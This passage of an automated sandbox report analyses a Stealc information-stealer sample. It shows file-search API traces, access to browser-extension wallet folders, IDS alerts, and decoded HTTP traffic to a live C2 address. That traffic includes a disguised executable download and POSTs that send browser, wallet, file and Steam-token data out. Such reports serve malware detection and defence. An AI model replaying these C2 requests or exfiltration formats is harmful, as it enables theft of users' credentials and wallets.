                    Source: Binary string: my_library.pdb source: b4s45TboUL.exe, b4s45TboUL.exe, 00000000.00000002.2106640783.000000006D001000.00000002.00000001.01000000.00000007.sdmp, b4s45TboUL.exe, 00000000.00000002.2091301864.0000000002490000.00000040.00001000.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000003.1686239349.0000000002570000.00000004.00001000.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                    Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: HIIDGCGCBF.exe, 00000004.00000002.1986378243.00007FF68D548000.00000040.00000001.01000000.00000008.sdmp, updater.exe, 0000002A.00000002.2010831986.00007FF7586B8000.00000040.00000001.01000000.0000000A.sdmp
                    Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: HIIDGCGCBF.exe, 00000004.00000002.1986378243.00007FF68D548000.00000040.00000001.01000000.00000008.sdmp, updater.exe, 0000002A.00000002.2010831986.00007FF7586B8000.00000040.00000001.01000000.0000000A.sdmp
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_004140F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_004140F0
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_0040E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E530
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_0040BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE40
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_00414B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414B60
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00401710
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_0040EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040EE20
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_00413B00 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00413B00
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_0040DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DF10
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_004147C0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_004147C0
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_0040DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DB80
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_0040F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F7B0
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 45.91.200.39:80
                    Source: Network trafficSuricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49730 -> 45.91.200.39:80
                    Source: Network trafficSuricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 45.91.200.39:80 -> 192.168.2.4:49730
                    Source: Network trafficSuricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49730 -> 45.91.200.39:80
                    Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 45.91.200.39:80 -> 192.168.2.4:49730
                    Source: Network trafficSuricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49730 -> 45.91.200.39:80
                    Source: Network trafficSuricata IDS: 2044249 - Severity 1 - ET MALWARE Win32/Stealc Submitting Screenshot to C2 : 192.168.2.4:49730 -> 45.91.200.39:80
                    Source: Malware configuration extractorURLs: http://45.91.200.39/eaa194fa594ff9c2.php
                    Source: Malware configuration extractorURLs: http://45.91.200.39/eaa194fa594ff9c2.php
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 30 Oct 2024 18:47:02 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
                    Source: global trafficHTTP traffic detected: GET /tmpp/chrome_131.exe HTTP/1.1Host: gosp.clinicavertigen.comCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 45.91.200.39Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /eaa194fa594ff9c2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCFHJJECAEHJJKEHIDBHost: 45.91.200.39Content-Length: 217Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 43 46 48 4a 4a 45 43 41 45 48 4a 4a 4b 45 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 36 38 31 33 30 44 37 38 38 45 43 32 32 37 33 38 34 38 33 30 38 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 46 48 4a 4a 45 43 41 45 48 4a 4a 4b 45 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 46 48 4a 4a 45 43 41 45 48 4a 4a 4b 45 48 49 44 42 2d 2d 0d 0a Data Ascii: ------AFCFHJJECAEHJJKEHIDBContent-Disposition: form-data; name="hwid"E68130D788EC2273848308------AFCFHJJECAEHJJKEHIDBContent-Disposition: form-data; name="build"LogsDiller------AFCFHJJECAEHJJKEHIDB--
                    Source: global trafficHTTP traffic detected: POST /eaa194fa594ff9c2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKFIDAAEHIEGCBFIDBFHost: 45.91.200.39Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 46 49 44 41 41 45 48 49 45 47 43 42 46 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 61 30 65 34 63 66 37 38 36 64 36 30 35 64 38 33 32 62 39 65 36 66 65 38 31 63 65 64 39 34 33 38 66 64 63 65 31 38 33 32 36 31 33 65 39 35 30 63 35 36 31 33 61 30 38 36 30 65 34 33 31 38 64 66 35 61 36 39 38 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 49 44 41 41 45 48 49 45 47 43 42 46 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 49 44 41 41 45 48 49 45 47 43 42 46 49 44 42 46 2d 2d 0d 0a Data Ascii: ------DBKFIDAAEHIEGCBFIDBFContent-Disposition: form-data; name="token"615a0e4cf786d605d832b9e6fe81ced9438fdce1832613e950c5613a0860e4318df5a698------DBKFIDAAEHIEGCBFIDBFContent-Disposition: form-data; name="message"browsers------DBKFIDAAEHIEGCBFIDBF--
                    Source: global trafficHTTP traffic detected: POST /eaa194fa594ff9c2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKFHIIEHIEGDHJJJKFIIHost: 45.91.200.39Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 46 48 49 49 45 48 49 45 47 44 48 4a 4a 4a 4b 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 61 30 65 34 63 66 37 38 36 64 36 30 35 64 38 33 32 62 39 65 36 66 65 38 31 63 65 64 39 34 33 38 66 64 63 65 31 38 33 32 36 31 33 65 39 35 30 63 35 36 31 33 61 30 38 36 30 65 34 33 31 38 64 66 35 61 36 39 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 48 49 49 45 48 49 45 47 44 48 4a 4a 4a 4b 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 48 49 49 45 48 49 45 47 44 48 4a 4a 4a 4b 46 49 49 2d 2d 0d 0a Data Ascii: ------JKFHIIEHIEGDHJJJKFIIContent-Disposition: form-data; name="token"615a0e4cf786d605d832b9e6fe81ced9438fdce1832613e950c5613a0860e4318df5a698------JKFHIIEHIEGDHJJJKFIIContent-Disposition: form-data; name="message"plugins------JKFHIIEHIEGDHJJJKFII--
                    Source: global trafficHTTP traffic detected: POST /eaa194fa594ff9c2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHIDGDHCGCBAKFHIIIIIHost: 45.91.200.39Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 49 44 47 44 48 43 47 43 42 41 4b 46 48 49 49 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 61 30 65 34 63 66 37 38 36 64 36 30 35 64 38 33 32 62 39 65 36 66 65 38 31 63 65 64 39 34 33 38 66 64 63 65 31 38 33 32 36 31 33 65 39 35 30 63 35 36 31 33 61 30 38 36 30 65 34 33 31 38 64 66 35 61 36 39 38 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 44 47 44 48 43 47 43 42 41 4b 46 48 49 49 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 44 47 44 48 43 47 43 42 41 4b 46 48 49 49 49 49 49 2d 2d 0d 0a Data Ascii: ------GHIDGDHCGCBAKFHIIIIIContent-Disposition: form-data; name="token"615a0e4cf786d605d832b9e6fe81ced9438fdce1832613e950c5613a0860e4318df5a698------GHIDGDHCGCBAKFHIIIIIContent-Disposition: form-data; name="message"fplugins------GHIDGDHCGCBAKFHIIIII--
                    Source: global trafficHTTP traffic detected: POST /eaa194fa594ff9c2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHIDHIEGIIIECAKEBFBHost: 45.91.200.39Content-Length: 5199Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cb9cc10e175e1537/sqlite3.dll HTTP/1.1Host: 45.91.200.39Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /eaa194fa594ff9c2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDHJEBFBFHJECAKFCAAHost: 45.91.200.39Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /eaa194fa594ff9c2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIIECAAKECFHIECBKJDHHost: 45.91.200.39Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 61 30 65 34 63 66 37 38 36 64 36 30 35 64 38 33 32 62 39 65 36 66 65 38 31 63 65 64 39 34 33 38 66 64 63 65 31 38 33 32 36 31 33 65 39 35 30 63 35 36 31 33 61 30 38 36 30 65 34 33 31 38 64 66 35 61 36 39 38 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 48 2d 2d 0d 0a Data Ascii: ------IIIECAAKECFHIECBKJDHContent-Disposition: form-data; name="token"615a0e4cf786d605d832b9e6fe81ced9438fdce1832613e950c5613a0860e4318df5a698------IIIECAAKECFHIECBKJDHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------IIIECAAKECFHIECBKJDHContent-Disposition: form-data; name="file"------IIIECAAKECFHIECBKJDH--
                    Source: global trafficHTTP traffic detected: POST /eaa194fa594ff9c2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JECGIIIDAKJDHJKFHIEBHost: 45.91.200.39Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 61 30 65 34 63 66 37 38 36 64 36 30 35 64 38 33 32 62 39 65 36 66 65 38 31 63 65 64 39 34 33 38 66 64 63 65 31 38 33 32 36 31 33 65 39 35 30 63 35 36 31 33 61 30 38 36 30 65 34 33 31 38 64 66 35 61 36 39 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 2d 2d 0d 0a Data Ascii: ------JECGIIIDAKJDHJKFHIEBContent-Disposition: form-data; name="token"615a0e4cf786d605d832b9e6fe81ced9438fdce1832613e950c5613a0860e4318df5a698------JECGIIIDAKJDHJKFHIEBContent-Disposition: form-data; name="message"wallets------JECGIIIDAKJDHJKFHIEB--
                    Source: global trafficHTTP traffic detected: POST /eaa194fa594ff9c2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIJEGDBGDBFIJKECBAKFHost: 45.91.200.39Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 61 30 65 34 63 66 37 38 36 64 36 30 35 64 38 33 32 62 39 65 36 66 65 38 31 63 65 64 39 34 33 38 66 64 63 65 31 38 33 32 36 31 33 65 39 35 30 63 35 36 31 33 61 30 38 36 30 65 34 33 31 38 64 66 35 61 36 39 38 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 2d 2d 0d 0a Data Ascii: ------HIJEGDBGDBFIJKECBAKFContent-Disposition: form-data; name="token"615a0e4cf786d605d832b9e6fe81ced9438fdce1832613e950c5613a0860e4318df5a698------HIJEGDBGDBFIJKECBAKFContent-Disposition: form-data; name="message"files------HIJEGDBGDBFIJKECBAKF--
                    Source: global trafficHTTP traffic detected: POST /eaa194fa594ff9c2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIEGHJEGHJKFIEBFHJKHost: 45.91.200.39Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 49 45 47 48 4a 45 47 48 4a 4b 46 49 45 42 46 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 61 30 65 34 63 66 37 38 36 64 36 30 35 64 38 33 32 62 39 65 36 66 65 38 31 63 65 64 39 34 33 38 66 64 63 65 31 38 33 32 36 31 33 65 39 35 30 63 35 36 31 33 61 30 38 36 30 65 34 33 31 38 64 66 35 61 36 39 38 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 45 47 48 4a 45 47 48 4a 4b 46 49 45 42 46 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 45 47 48 4a 45 47 48 4a 4b 46 49 45 42 46 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 45 47 48 4a 45 47 48 4a 4b 46 49 45 42 46 48 4a 4b 2d 2d 0d 0a Data Ascii: ------CGIEGHJEGHJKFIEBFHJKContent-Disposition: form-data; name="token"615a0e4cf786d605d832b9e6fe81ced9438fdce1832613e950c5613a0860e4318df5a698------CGIEGHJEGHJKFIEBFHJKContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------CGIEGHJEGHJKFIEBFHJKContent-Disposition: form-data; name="file"------CGIEGHJEGHJKFIEBFHJK--
                    Source: global trafficHTTP traffic detected: POST /eaa194fa594ff9c2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJDBGDGCGDAKFIDGIDBHost: 45.91.200.39Content-Length: 113023Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /eaa194fa594ff9c2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBFIIIEHCFHJKFHDHDAHost: 45.91.200.39Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 46 49 49 49 45 48 43 46 48 4a 4b 46 48 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 61 30 65 34 63 66 37 38 36 64 36 30 35 64 38 33 32 62 39 65 36 66 65 38 31 63 65 64 39 34 33 38 66 64 63 65 31 38 33 32 36 31 33 65 39 35 30 63 35 36 31 33 61 30 38 36 30 65 34 33 31 38 64 66 35 61 36 39 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 46 49 49 49 45 48 43 46 48 4a 4b 46 48 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 46 49 49 49 45 48 43 46 48 4a 4b 46 48 44 48 44 41 2d 2d 0d 0a Data Ascii: ------JEBFIIIEHCFHJKFHDHDAContent-Disposition: form-data; name="token"615a0e4cf786d605d832b9e6fe81ced9438fdce1832613e950c5613a0860e4318df5a698------JEBFIIIEHCFHJKFHDHDAContent-Disposition: form-data; name="message"ybncbhylepme------JEBFIIIEHCFHJKFHDHDA--
